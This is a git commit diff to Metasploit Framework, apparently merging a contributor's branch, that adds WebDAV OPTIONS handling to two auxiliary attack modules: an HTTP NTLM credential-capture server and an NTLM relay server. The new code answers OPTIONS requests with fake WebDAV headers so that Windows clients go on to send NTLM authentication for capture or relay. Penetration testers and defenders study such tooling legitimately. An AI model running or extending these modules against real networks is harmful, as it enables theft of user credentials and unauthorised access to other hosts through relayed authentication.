Merge branch 'webdav_fix' of https://github.com/mubix/metasploit-framework into mubix-webdav_fix

2012-08-24 11:18:50 -05:00 · 2012-08-24 11:18:50 -05:00 · 3036f7725d
parent ea7d7b847a d0558218ee
commit 3036f7725d
2 changed files with 86 additions and 42 deletions
--- a/modules/auxiliary/server/capture/http_ntlm.rb
+++ b/modules/auxiliary/server/capture/http_ntlm.rb
@ -68,6 +68,10 @@ class Metasploit3 < Msf::Auxiliary
 	def on_request_uri(cli, request)
 		print_status("Request '#{request.uri}'...")
 		
+		case request.method
+		when 'OPTIONS'
+			process_options(cli, request)
+		else
 			# If the host has not started auth, send 401 authenticate with only the NTLM option
 			if(!request.headers['Authorization'])
 				response = create_response(401, "Unauthorized")
@ -86,6 +90,7 @@ class Metasploit3 < Msf::Auxiliary
 				cli.send_response(response)
 			end
 		end
+	end

 	def run
 		if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/
@ -97,6 +102,23 @@ class Metasploit3 < Msf::Auxiliary
 		exploit()
 	end
 	
+	def process_options(cli, request)
+		print_status("OPTIONS #{request.uri}")
+		headers = {
+			'MS-Author-Via' => 'DAV',
+			'DASL'          => '<DAV:sql>',
+			'DAV'           => '1, 2',
+			'Allow'         => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
+			'Public'        => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
+			'Cache-Control' => 'private'
+		}
+		resp = create_response(207, "Multi-Status")
+		headers.each_pair {|k,v| resp[k] = v }
+		resp.body = ""
+		resp['Content-Type'] = 'text/xml'
+		cli.send_response(resp)
+	end
+
 	def handle_auth(cli,hash)
 		#authorization string is base64 encoded message
 		message = Rex::Text.decode_base64(hash)
--- a/modules/auxiliary/server/http_ntlmrelay.rb
+++ b/modules/auxiliary/server/http_ntlmrelay.rb
@ -94,6 +94,10 @@ class Metasploit3 < Msf::Auxiliary
 	# Handles the initial requests waiting for the browser to try NTLM auth
 	def on_request_uri(cli, request)
 	
+		case request.method
+		when 'OPTIONS'
+			process_options(cli, request)
+		else
 			datastore['REQUEST_IP'] = cli.peerhost
 			cli.keepalive = true;

@ -126,12 +130,30 @@ class Metasploit3 < Msf::Auxiliary

 			handle_relay(cli,hash)
 		end
+	end

 	def run
 		parse_args()
 		exploit()
 	end
 	
+	def process_options(cli, request)
+		print_status("OPTIONS #{request.uri}")
+		headers = {
+			'MS-Author-Via' => 'DAV',
+			'DASL'          => '<DAV:sql>',
+			'DAV'           => '1, 2',
+			'Allow'         => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
+			'Public'        => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
+			'Cache-Control' => 'private'
+		}
+		resp = create_response(207, "Multi-Status")
+		headers.each_pair {|k,v| resp[k] = v }
+		resp.body = ""
+		resp['Content-Type'] = 'text/xml'
+		cli.send_response(resp)
+	end
+
 	#The call to handle_relay should be a victim HTTP type 1 request
 	def handle_relay(cli_sock, hash)
 		print_status("Beginning NTLM Relay...")